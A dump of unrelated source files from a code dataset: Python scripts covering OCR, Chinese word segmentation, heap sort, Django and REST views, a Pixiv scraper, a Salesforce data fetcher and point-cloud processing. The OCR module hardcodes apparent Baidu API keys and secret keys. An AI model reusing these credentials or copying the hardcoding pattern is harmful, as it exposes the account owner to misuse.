test1\n\n \n \nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)\n","repo_name":"harshaldeokarutd/HackerRank_solutions","sub_path":"Swap Case.py","file_name":"Swap Case.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28631912426","text":"from aip import AipOcr\r\nimport cv2\r\ndef get_file_content(filePath):\r\n with open(filePath, 'rb') as fp:\r\n return fp.read()\r\n\r\nclass Ocr_module():\r\n def __init__(self,):\r\n APP_ID = \"22729886\"\r\n API_KEY = \"EDrxKsEyjZ6VZXPMc9yZrnlp\"\r\n SECRET_KEY = \"Ax5HgTPasDqpLocaMIFQEjGWI6bQWkdH\"\r\n # APP_ID = \"16889798\"\r\n # API_KEY = \"TTP9lDBpD4vvrxoaBWyq7wn1\"\r\n # SECRET_KEY = \"zNFwdQTdmIpa4YSnIA73GgFk1zjjbI5W\"\r\n self.client_for_ocr = AipOcr(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n def get_ocr(self, image):\r\n image = cv2.cvtColor(image,cv2.COLOR_RGB2BGR)\r\n cv2.imwrite(\"ocr_work/ocr_photo.jpg\", image)\r\n \r\n # 读取图像\r\n image = get_file_content(\"ocr_work/ocr_photo.jpg\")\r\n options = {\"language_type\": \"CHN_ENG\", \"detect_direction\": \"true\", \"detect_language\": \"true\"}\r\n # 进行检测\r\n result_dict = self.client_for_ocr.basicAccurate(image, options)\r\n\r\n # 获得预测结果\r\n result_list = result_dict[\"words_result\"]\r\n orc_save_sentence = \"\"\r\n for item in result_list:\r\n for string in item:\r\n orc_save_sentence = orc_save_sentence + item[string]\r\n return orc_save_sentence","repo_name":"AGuangzzz/Help_blind_project","sub_path":"Ocr_work/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29862934369","text":"#-*-coding: utf-8-*-\r\n\r\nimport os\r\nimport jieba\r\nimport jieba.posseg as pseg\r\n\r\ncx_dict = set(['n','Ng','Vg','v','vd','vn'])\r\n\r\nabs_path = os.path.dirname(os.path.abspath(__file__))\r\nABSOLUTE_DICT_PATH = os.path.abspath(os.path.join(abs_path, './dict'))\r\nCUSTOM_DICT_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'userdic.txt')\r\nEXTRA_STOPWORD_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'stopword.txt')\r\nEXTRA_EMOTIONWORD_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'emotionlist.txt')\r\nEXTRA_ONE_WORD_WHITE_LIST_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'one_word_white_list.txt')\r\nEXTRA_BLACK_LIST_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'black.txt')\r\n\r\ndef load_one_words():\r\n one_words = [line.strip('\\r\\n') for line in file(EXTRA_EMOTIONWORD_PATH)]\r\n return one_words\r\n\r\ndef load_black_words():\r\n one_words = [line.strip('\\r\\n') for line in file(EXTRA_BLACK_LIST_PATH)]\r\n return one_words\r\n\r\ndef load_stop_words():\r\n\tstop_words = [line.strip('\\r\\n').split(\" \")[0] for line in file(EXTRA_STOPWORD_PATH)]\r\n\treturn stop_words\r\n\r\nsingle_word_whitelist = set(load_one_words())\r\nblack_word = set(load_black_words())\r\nstop_words = set(load_stop_words())\r\n\r\njieba.load_userdict(CUSTOM_DICT_PATH)\r\n\r\ndef segment(string):\r\n\t\"\"\"string: utf-8\r\n\t\"\"\"\r\n\tfinal_words = []\r\n\twords = pseg.cut(string)\r\n\tfor word, flag in words:\r\n\t\tif flag in cx_dict and (len(word) > 1 or word in single_word_whitelist) and word not in black_word and word not in stop_words:\r\n\t\t\tfinal_words.append(word)\r\n\r\n\treturn final_words\r\n","repo_name":"jianjian0dandan/info_consume","sub_path":"user_portrait/user_portrait/info_consume/save_csv/cut_word.py","file_name":"cut_word.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23543777363","text":"\ndef LEFT(i):\n return 2*i+1\ndef RIGHT(i):\n return 2*i+2\ndef max_heapify(A,i):\n l=LEFT(i)\n r=RIGHT(i)\n if l<= size and A[l]>A[i]:\n largest=l\n else:\n largest=i\n if r<=size and A[r]>A[largest]:\n largest=r\n if largest !=i:\n A[i],A[largest]=A[largest],A[i]\n max_heapify(A,largest)\nA=[16,4,10,14,7,9,3,2,8,1]\nsize=len(A)-1\nlength=len(A)-1\ndef build_max_heap(A):\n for i in range(size//2,-1,-1):\n max_heapify(A,i)\nresult=build_max_heap(A)\nprint(A)\nfor i in range(length,0,-1):\n A[0],A[i]=A[i],A[0]\n size-=1\n max_heapify(A,0)\nprint(A)\n\n\n","repo_name":"rihengzhu/Algorithm","sub_path":"heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32348588523","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\n\n\n\nurlpatterns = [\n path('ex/', views.homePage, name=\"homePage\"),\n path('', views.home, name=\"home\"),\n path('members/', views.members, name=\"members\"),\n path('profile//', views.profile, name=\"profile\"),\n\n path('create_tier//',views.createTier, name=\"create_tier\"),\n path('update_tier//',views.updateTier, name=\"update_tier\"),\n path('delete_tier//',views.deleteTier, name=\"delete_tier\"),\n\n path('add_game/',views.newGame, name=\"add_game\"),\n path('add_member/',views.newMember, name=\"add_member\"),\n path('delete_member//',views.deleteMember, name=\"delete_member\"),\n\n path('register/', views.registerPage, name = \"register\"),\n path('login/', views.loginPage, name = \"login\"),\n path('logout/', views.logoutUser, name = \"logout\"),\n\n path('hierarchy/', views.hierarchy, name=\"hierarchy\"),\n path('userprofile//', views.userprofile, name=\"userprofile\"),\n path('updateuser//', views.updateuser, name=\"updateuser\"),\n\n path('teamlist/', views.teamlist, name=\"teamlist\"),\n path('addteam/', views.addTeam, name=\"addteam\"),\n path('team//', views.team, name=\"team\"),\n\n path('addtournament/', views.addTournament, name=\"addtournament\"),\n path('tournament/', views.Tourn, name=\"tournament\"),\n path('addt/', views.AddT, name=\"addt\"),\n path('deletetournament/', views.DelTourn, name=\"deleteTourn\"),\n\n path('apply/', views.Apply, name='apply'),\n path('approve/', views.Approve, name='approve'),\n path('delete/', views.Delete, name='delete'),\n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"neelraval13/VoltFraction","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74995981953","text":"from collections import deque\n\nfor _ in range(10):\n t = int(input())\n nums = deque(map(int, input().split()))\n\n minus = 1\n while True:\n if minus == 6:\n minus = 1\n\n tmp = nums.popleft()\n if tmp - minus > 0:\n nums.append(tmp - minus)\n else:\n nums.append(0)\n break\n\n minus += 1\n\n print(f\"#{t}\", end=\" \")\n nums = list(nums)\n print(*nums)\n","repo_name":"yunkh2005/SWEA","sub_path":"D3/1225.py","file_name":"1225.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74331965955","text":"from typing import Any\n\nfrom rabbitark.config import config\nfrom rabbitark.error import NotFound\nfrom rabbitark.rabbitark import RabbitArk\nfrom rabbitark.utils.default_class import DownloadInfo, Image\nfrom rabbitark.utils.request import Request\nfrom rabbitark.utils.utils import folder_name_checker, get_urls, split\n\n\nclass PixivRequester(Request):\n def __init__(self):\n super().__init__(\n headers={\n \"accept-encoding\": \"gzip, deflate, br\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\",\n \"referer\": \"https://pixiv.net\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-origin\",\n },\n cookies=config.COOKIES,\n )\n\n # async def get_postkey(self):\n # r = await self.get(\"https://www.pixiv.net/\", \"text\")\n # return re.findall(r'.*pixiv.context.token = \"([a-z0-9]{32})\"?.*', r.body)[0]\n\n async def get_illust_info(self, illust_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/illust/{illust_id}\",\n \"json\",\n )\n if info.status == 200:\n return info.body\n else:\n return\n\n async def get_illust_urls(self, illust_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/illust/{illust_id}/pages\",\n \"json\",\n )\n return [page[\"urls\"][\"original\"] for page in info.body[\"body\"]]\n\n async def get_user_info(self, user_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/user/{user_id}?full=1\", \"json\"\n )\n if info.status == 200:\n return info.body[\"body\"][\"name\"]\n else:\n return None\n\n async def get_user_all_illust(self, user_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/user/{user_id}/profile/all\",\n \"json\",\n )\n return info.body[\"body\"][\"illusts\"].keys()\n\n async def user_images(self, user_id):\n user_all_illust = await self.get_user_all_illust(user_id)\n url_list = await get_urls(self.get_illust_urls, user_all_illust)\n return url_list\n\n async def checking_id(self, pixiv_id):\n illust = await self.get_illust_info(pixiv_id)\n if illust:\n return await self.single_images(pixiv_id)\n\n username = await self.get_user_info(pixiv_id)\n if username:\n return await self.user(pixiv_id)\n\n raise NotFound(pixiv_id)\n\n async def single_images(self, illust_id):\n info = await self.get_illust_info(illust_id)\n if not info:\n return\n urls = await self.get_illust_urls(illust_id)\n return DownloadInfo(\n [Image(url) for url in urls],\n folder_name_checker(info[\"body\"][\"title\"]),\n self.headers,\n )\n\n async def user(self, user_id):\n username = await self.get_user_info(user_id)\n if not username:\n return\n url_list = await self.user_images(user_id)\n return DownloadInfo(\n [Image(url) for url in url_list],\n folder_name_checker(username),\n self.headers,\n )\n\n\n@RabbitArk.register(\"pixiv\")\nclass Pixiv(PixivRequester):\n def __init__(self):\n super().__init__()\n\n async def extractor_download(self, downloadable: Any) -> DownloadInfo:\n if downloadable.isdigit():\n info = await self.checking_id(downloadable)\n else:\n if \"artwork\" in downloadable:\n info = await self.single_images(split(downloadable))\n elif \"user\" in downloadable:\n info = await self.user(split(downloadable))\n else:\n raise NotFound(downloadable)\n\n if not info:\n raise NotFound(downloadable)\n\n return info\n","repo_name":"Saebasol/rabbit-ark","sub_path":"rabbitark/extractor/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"42062461034","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('judges', '0006_auto_20151221_1551'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='judge',\n options={'permissions': (('has_beta_api_access', 'Can access features during beta period.'),)},\n ),\n ]\n","repo_name":"brianwc/courtlistener","sub_path":"cl/judges/migrations/0007_auto_20151230_1709.py","file_name":"0007_auto_20151230_1709.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"25655365424","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('skill/',views.skill,name='skill'),\n path('education/',views.education,name='education'),\n path('project/',views.project,name='project'),\n path('experience/',views.experience,name='experience'),\n path('training/',views.training,name='training'),\n]\n","repo_name":"ayush4545/Django_MyResume","sub_path":"edu/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39341060661","text":"from rest_framework import viewsets, permissions\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import *\nfrom rest_framework.response import Response\n\nfrom common.exception_response import ExceptionResponse, ErrorCode\nfrom .serilaizers_schedule import *\nfrom .serializers_recruitment import *\nfrom circle.functions import *\nfrom circle.models import Circle\n\n# Create your views here.\n\n\nclass RecruitmentViewSet(viewsets.GenericViewSet):\n serializer_class = RecruitmentSerializer\n permission_classes = (permissions.AllowAny,) # 테스트용 임시\n\n def get_queryset(self):\n return Recruitment.objects.all()\n\n # GET circle/{id}/recruitment/\n def list(self, request, circle_id):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n queryset = self.get_queryset()\n queryset = queryset.filter(circle_id=circle_id)\n\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = RecruitmentViewSerializer(\n page, many=True, context={\"request\": request}\n )\n return self.get_paginated_response(serializer.data)\n else:\n return ExceptionResponse(\n status=status.HTTP_400_BAD_REQUEST,\n detail=\"Page is None\",\n code=ErrorCode.PAGINATION_FAULT,\n ).to_response()\n\n # GET circle/{id}/recruitment/{default, id}/\n def retrieve(self, request, circle_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(pk, circle)\n if error:\n return error\n\n return Response(\n status=status.HTTP_200_OK,\n data=RecruitmentViewSerializer(recruitment).data,\n )\n\n # POST circle/{id}/recruitment/\n def create(self, request, circle_id):\n\n recruitments = Recruitment.objects.filter(circle_id=circle_id)\n if len(recruitments) > 0:\n return ExceptionResponse(\n status=status.HTTP_409_CONFLICT,\n detail=\"동아리에 Recruitment가 이미 존재합니다.\",\n code=ErrorCode.CONFLICT,\n ).to_response()\n\n data = request.data.copy()\n data[\"circle\"] = circle_id\n\n serializer = self.get_serializer(data=data, context={\"request\": request})\n serializer.is_valid(raise_exception=True)\n recruitment = serializer.save()\n\n return Response(\n status=status.HTTP_201_CREATED,\n data=RecruitmentViewSerializer(recruitment).data,\n )\n\n # PUT circle/{id}/recruitment/{default, id}\n def update(self, request, circle_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(pk, circle)\n if error:\n return error\n\n serializer = RecruitmentUpdateSerializer(recruitment, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.update(recruitment, serializer.validated_data)\n\n return Response(\n status=status.HTTP_200_OK, data=RecruitmentViewSerializer(recruitment).data\n )\n\n # DELETE circle/{id}/recruitment/{default, id}\n def destroy(self, request, circle_id, pk):\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(pk, circle)\n if error:\n return error\n\n recruitment.delete()\n\n return Response(\n status=status.HTTP_200_OK, data={\"detail\": \"deleted successfully\"}\n )\n\n\nclass RecruitmentScheduleViewSet(viewsets.GenericViewSet):\n serializer_class = RecruitScheduleSerializer\n permission_classes = (permissions.AllowAny,) # 테스트용 임시\n\n # GET circle/{id}/recruitment/{id}/schedule/\n def list(self, request, circle_id, recruitment_id):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(recruitment_id, circle)\n if error:\n return error\n\n queryset = self.get_queryset().filter(recruitment=recruitment)\n page = self.paginate_queryset(queryset)\n\n if page is not None:\n serializer = RecruitScheduleViewSerializer(\n page, many=True, context={\"request\": request}\n )\n return self.get_paginated_response(serializer.data)\n else:\n return ExceptionResponse(\n status=status.HTTP_400_BAD_REQUEST,\n detail=\"Page is None\",\n code=ErrorCode.PAGINATION_FAULT,\n ).to_response()\n\n def get_queryset(self):\n return RecruitmentSchedule.objects.all()\n\n # POST circle/{id}/recruitment/\n def create(self, request, circle_id, recruitment_id):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(recruitment_id, circle)\n if error:\n return error\n\n data = request.data.copy()\n data[\"recruitment\"] = recruitment.id\n\n serializer = self.get_serializer(data=data, context={\"request\": request})\n serializer.is_valid(raise_exception=True)\n recruitment_schedule = serializer.save()\n\n return Response(\n status=status.HTTP_201_CREATED,\n data=RecruitScheduleViewSerializer(recruitment_schedule).data,\n )\n\n # PUT circle/{id}/recruitment/{id}/schedule/{id}\n def update(self, request, circle_id, recruitment_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(recruitment_id, circle)\n if error:\n return error\n\n error, recruitment_schedule = find_recruitment_schedule(pk, recruitment)\n if error:\n return error\n\n serializer = RecruitScheduleUpdateSerializer(\n recruitment_schedule, data=request.data\n )\n serializer.is_valid(raise_exception=True)\n serializer.update(recruitment_schedule, serializer.validated_data)\n\n return Response(\n status=status.HTTP_201_CREATED,\n data=RecruitScheduleViewSerializer(recruitment_schedule).data,\n )\n\n # DELETE circle/{id}/recruitment/{default, id}\n def destroy(self, request, circle_id, recruitment_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(pk, circle)\n if error:\n return error\n\n error, recruitment_schedule = find_recruitment_schedule(pk, recruitment)\n if error:\n return error\n\n recruitment_schedule.schedule.delete()\n\n return Response(\n status=status.HTTP_200_OK, data={\"detail\": \"deleted successfully\"}\n )\n\n\n@api_view((\"GET\",))\n@permission_classes((AllowAny,))\ndef get_recruitment_list_by_circle_name(request, circle_name):\n if not Circle.objects.filter(name=circle_name).exists():\n return ExceptionResponse(\n status=status.HTTP_404_NOT_FOUND,\n detail=\"name: \" + circle_name + \"에 해당하는 동아리가 존재하지 않습니다.\",\n code=ErrorCode.CIRCLE_NOT_FOUND,\n ).to_response()\n circle = Circle.objects.get(name=circle_name)\n recruitment = Recruitment.objects.filter(circle=circle.id)\n return Response(RecruitmentSerializer(recruitment, many=True).data)\n","repo_name":"wafflestudio/sharkle-server","sub_path":"sharkle/recruitment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"37839222836","text":"import json\n\nimport click\nfrom fetch_charitybase import get_charity_numbers, get_charitybase_data, get_iso_lookup\nfrom fetch_salesforce import fetch_data, get_salesforce_instance\nfrom fetch_styles import fetch_header_and_footer\nfrom sdgs import SDG_NAMES, clean_sdgs\nfrom settings import FINAL_OUTPUT\nfrom utils import clean_object\n\n\n@click.command()\n@click.option(\"--output\", default=FINAL_OUTPUT, show_default=True)\ndef main(output):\n click.echo(\"Fetching data from salesforce\")\n sf = get_salesforce_instance()\n members = dict(fetch_data(sf))\n click.echo(f\"Fetched {len(members):,.0f} records from salesforce\")\n\n click.echo(\"Clean SDG data\")\n members = dict(clean_sdgs(members))\n click.echo(\"Get Charity Commission key -> ISO country code lookups\")\n iso_lookup = get_iso_lookup()\n click.echo(\"Extract charity numbers to fetch\")\n charity_numbers = get_charity_numbers(members)\n click.echo(\n f\"Fetching data on {len(charity_numbers):,.0f} charities from CharityBase\"\n )\n charity_data = get_charitybase_data(charity_numbers, iso_lookup)\n click.echo(f\"Fetched data on {len(charity_data):,.0f} charities from CharityBase\")\n\n click.echo(\"Add charity data to member data\")\n members_for_site = {}\n for k, m in members.items():\n if m[\"Remove_from_member_directory__c\"]:\n continue\n charity = charity_data.get(\n m[\"Charity_Commission_number__c\"],\n {\n \"logourl\": None,\n \"activities\": m.get(\"Description\"),\n \"countries\": [],\n },\n )\n if \"Description\" in m:\n del m[\"Description\"]\n members_for_site[k] = {**charity, **clean_object(m)}\n\n click.echo(\"Write data to output file\")\n with open(output, \"w\", encoding=\"utf8\") as a:\n json.dump(\n {\n \"members\": members_for_site,\n \"sdgs\": dict(zip(SDG_NAMES.values(), SDG_NAMES.keys())),\n },\n a,\n indent=4,\n )\n click.echo(f\"Data written to `{output}`\")\n\n click.echo(\"Fetch header and footer\")\n fetch_header_and_footer()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bond-member-directory/bond-membership","sub_path":"fetch-data/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32507933299","text":"import scipy.io as scio\r\nimport numpy as np\r\nimport os\r\nimport math\r\n# from stl import mesh # numpy-stl\r\nimport open3d\r\nfrom sklearn.mixture import GaussianMixture\r\nfrom sklearn.metrics import davies_bouldin_score\r\n\r\n\r\ndef mkdir(path):\r\n '''\r\n 判断是否存在文件夹, 如果不存在则创建为文件夹\r\n :param path:文件夹路径\r\n :return:\r\n '''\r\n folder = os.path.exists(path)\r\n if not folder:\r\n os.makedirs(path)\r\n\r\n\r\ndef PtSegmentation(path, type, save_dir, save_name=None):\r\n if type is 'mat':\r\n data = scio.loadmat(path)\r\n pts = data['points']\r\n else:\r\n print('wrong input \\\"type\\\"!')\r\n os._exit(0)\r\n return\r\n\r\n if save_name is None:\r\n save_name = os.path.basename(path)[:-4]\r\n\r\n z = pts[:, 2].reshape(-1, 1)\r\n gmm_2 = GaussianMixture(n_components=2).fit(z)\r\n labels_2 = gmm_2.predict(z)\r\n\r\n if davies_bouldin_score(z, labels_2) < 0.4:\r\n if gmm_2.means_[0] > gmm_2.means_[1]:\r\n pts = pts[labels_2 == 0]\r\n else:\r\n pts = pts[labels_2 == 1]\r\n\r\n mkdir(save_dir)\r\n file = open(save_dir + save_name + '.txt', 'w')\r\n file.close()\r\n\r\n mkdir(save_dir)\r\n scio.savemat(save_dir + save_name + '.mat', {'points': pts})\r\n\r\n\r\ndef ComputePt(centralized_verts, r):\r\n '''\r\n :param centralized_verts: 中心化的点云数据(Nx3)\r\n :param r: 以某点附近半径r的球形域内部点作为平面微元\r\n :return:\r\n '''\r\n # 初始化法向量、表面深度存储\r\n normal_vec = np.nan * np.ones((centralized_verts.shape[0], 3))\r\n surface_depth = np.nan * np.ones(centralized_verts.shape[0])\r\n\r\n verts_len = centralized_verts.shape[0]\r\n\r\n mean = np.mean\r\n svd = np.linalg.svd\r\n argmin = np.argmin\r\n\r\n pcd = open3d.geometry.PointCloud()\r\n pcd.points = open3d.utility.Vector3dVector(centralized_verts)\r\n pcd_tree = open3d.geometry.KDTreeFlann(pcd)\r\n\r\n for i in range(verts_len):\r\n\r\n # 将所有与选定点距离小于r的点构成平面\r\n point = centralized_verts[i, :]\r\n\r\n [_, idx, _] = pcd_tree.search_radius_vector_3d(pcd.points[i], r)\r\n\r\n Plane = centralized_verts[idx, :]\r\n\r\n # 微元平面中心化\r\n plane_center = np.array([mean(Plane[:, 0]), mean(Plane[:, 1]), mean(Plane[:, 2])])\r\n centerPlane = Plane - plane_center\r\n\r\n # SVD分解找到法向量\r\n [_, S, VT] = svd(centerPlane)\r\n V = VT.T\r\n\r\n # 如果周围点不足,此点作废\r\n if S.shape[0] < 3:\r\n continue\r\n\r\n # 法向量为投影强度最小对应的特征向量\r\n plane_nv = np.ascontiguousarray(V[:, argmin(np.array([S[0], S[1], S[2]]))]) # 局部平面法向量\r\n\r\n # 校正法向量方向,从点云中心指向局部平面\r\n if plane_center.dot(plane_nv) < 0:\r\n plane_nv = -plane_nv\r\n\r\n # 保存法向量\r\n normal_vec[i, :] = plane_nv\r\n\r\n # 表面深度\r\n surface_depth[i] = np.vdot(point - plane_center, plane_nv)\r\n\r\n # print('\\n')\r\n return normal_vec, surface_depth\r\n\r\n\r\ndef ComputePtData(path, type='stl', r=0.15, save_dir=None, save_name=None, rotate=None):\r\n '''\r\n 计算点云中每个点的法向量和表面深度\r\n :param path: 文件路径\r\n :param r: 以某点附近半径r的球形域内部点作为平面微元\r\n :param save_dir: 数据保存路径\r\n :param save_name: 数据保存名称,默认为读入的名称\r\n :return: 点云(Nx3), 法向量(Nx3), 归一化后的表面深度(Nx3)\r\n '''\r\n if type is 'mat':\r\n data = scio.loadmat(path)\r\n points = data['points']\r\n else:\r\n print('error input \\\"type\\\"!')\r\n os._exit(0)\r\n return\r\n\r\n if save_name is None:\r\n save_name = os.path.basename(path)[:-4]\r\n\r\n if rotate is not None:\r\n R = Ang2Matrix(rotate[0], rotate[1], rotate[2], type='ang')\r\n points = np.dot(points, R.T)\r\n\r\n verts_center = np.mean(points, 0) # 点云中心\r\n\r\n # 中心化\r\n points -= verts_center\r\n\r\n # normals, depth = JitComputePt(points, r)\r\n normals, depth = ComputePt(points, r)\r\n\r\n # 排除孤立点\r\n points = points[~np.isnan(depth), :]\r\n normals = normals[~np.isnan(depth), :]\r\n # stl_normals = stl_normals[~np.isnan(depth), :]\r\n depth = depth[~np.isnan(depth)].reshape(-1, 1)\r\n\r\n if save_dir is not None:\r\n mkdir(save_dir)\r\n scio.savemat(save_dir + save_name + '.mat',\r\n {'points': points, 'normals': normals, 'depth': depth})\r\n\r\n\r\ndef Ang2Matrix(pitch, yaw, roll, type):\r\n '''\r\n 从角度转换为旋转矩阵,弧度制\r\n :param pitch:绕X轴旋转\r\n :param yaw:绕Y轴旋转\r\n :param roll:绕Z轴旋转\r\n :param type:'ang'角度制,'rad'弧度制\r\n :return:旋转矩阵R\r\n '''\r\n if type is 'ang':\r\n pitch, yaw, roll = math.radians(pitch), math.radians(yaw), math.radians(roll)\r\n elif type is not 'rad':\r\n print('wrong input in Ang2Matrix \\\"measure\\\"!')\r\n os._exit(0)\r\n\r\n Rx = np.array([[1, 0, 0],\r\n [0, np.cos(pitch), - np.sin(pitch)],\r\n [0, np.sin(pitch), np.cos(pitch)]])\r\n Ry = np.array([[np.cos(yaw), 0, np.sin(yaw)],\r\n [0, 1, 0],\r\n [-np.sin(yaw), 0, np.cos(yaw)]])\r\n Rz = np.array([[np.cos(roll), -np.sin(roll), 0],\r\n [np.sin(roll), np.cos(roll), 0],\r\n [0, 0, 1]])\r\n R = np.dot(np.dot(Rx, Ry), Rz)\r\n return R\r\n","repo_name":"keyunj/fptools","sub_path":"fp_3dFunctions/3D_PtProcess/PtFunctions.py","file_name":"PtFunctions.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17911805062","text":"#Importaciones\r\nimport pyautogui\r\nimport time\r\n#variables\r\narray_repetir = str(input(\"inserte palabra para repetir: \"))\r\ntiempo_antes_iniciar = int(input(\"Inserte tiempo antes de iniciar: \"))\r\ntiempo_entre__envios = int(input(\"Inserte tiempo entre mensaje y mensaje: \"))\r\n#main\r\ntime.sleep(tiempo_antes_iniciar)\r\nwhile True:\r\n pyautogui.typewrite(array_repetir)\r\n time.sleep(tiempo_entre__envios)\r\n pyautogui.press(\"enter\")","repo_name":"SrSpooderman/Script_Spamer","sub_path":"Palabra.py","file_name":"Palabra.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32408575520","text":"import numpy as np\nimport logging,sys\nimport math\nfrom scipy.ndimage.interpolation import rotate\nimport matplotlib.pyplot as plt\n\ndef op(input, angle, visual=False):\n nPix = input.shape[0]\n inpRep = np.tile(input, (3, 3))\n outRep = rotate(inpRep, angle, reshape=False)\n out = outRep[nPix:2 * nPix, nPix:2 * nPix]\n\n if visual:\n plt.subplot(2, 2, 1)\n plt.imshow(input,cmap = plt.get_cmap('gray'))\n plt.title('Input')\n plt.subplot(2, 2, 2)\n plt.imshow(out, cmap=plt.get_cmap('gray'))\n plt.title('Output')\n plt.subplot(2, 2, 3)\n plt.imshow(inpRep, cmap=plt.get_cmap('gray'))\n plt.title('Input 3x3')\n plt.subplot(2, 2, 4)\n plt.imshow(outRep, cmap=plt.get_cmap('gray'))\n plt.title('Output 3x3')\n plt.show()\n return out\n\nif __name__ == '__main__':\n\n # tested using a 6x6 image\n img = np.loadtxt(sys.argv[1])\n ang = float(sys.argv[2]) # in degrees\n visual = bool(sys.argv[3])\n result = op(img,ang,visual)\n\n\n","repo_name":"evanseitz/ManifoldEM_Python","sub_path":"modules/rotatefill.py","file_name":"rotatefill.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"24760692951","text":"def is_overlapping(pair):\n separated_pairs = pair.split(\",\")\n first_interval = separated_pairs[0].split(\"-\")\n second_interval = separated_pairs[1].split(\"-\")\n if int(first_interval[0]) <= int(second_interval[0]) and int(second_interval[1]) <= int(first_interval[1]):\n return True\n if int(second_interval[0]) <= int(first_interval[0]) and int(first_interval[1]) <= int(second_interval[1]):\n return True\n return False\n\n\nwith open(\"input.txt\", \"r\") as input:\n data = input.read().split(\"\\n\")\n overlapping_pairs = filter(is_overlapping, data)\n result = len(list(overlapping_pairs))\n","repo_name":"WiebkeFr/advent-of-code-2022","sub_path":"day-04/part-01.py","file_name":"part-01.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42070799903","text":"import os\nimport sys\nimport locale\n\ndef tty_wrapper(function, *args, **kwargs):\n stdin_fd = os.dup(sys.stdin.fileno())\n stdout_fd = os.dup(sys.stdout.fileno())\n # set stdin to tty\n tty_in = open('/dev/tty', 'r')\n os.dup2(tty_in.fileno(), sys.stdin.fileno())\n # set stdout to tty\n tty_out = open('/dev/tty', 'w')\n os.dup2(tty_out.fileno(), sys.stdout.fileno())\n # os.system('ls -l /proc/self/fd/')\n locale.setlocale(locale.LC_ALL, '')\n import curses\n result = curses.wrapper(function, *args, **kwargs)\n # reset stdin and stdout\n os.dup2(stdin_fd, sys.stdin.fileno())\n os.dup2(stdout_fd, sys.stdout.fileno())\n return 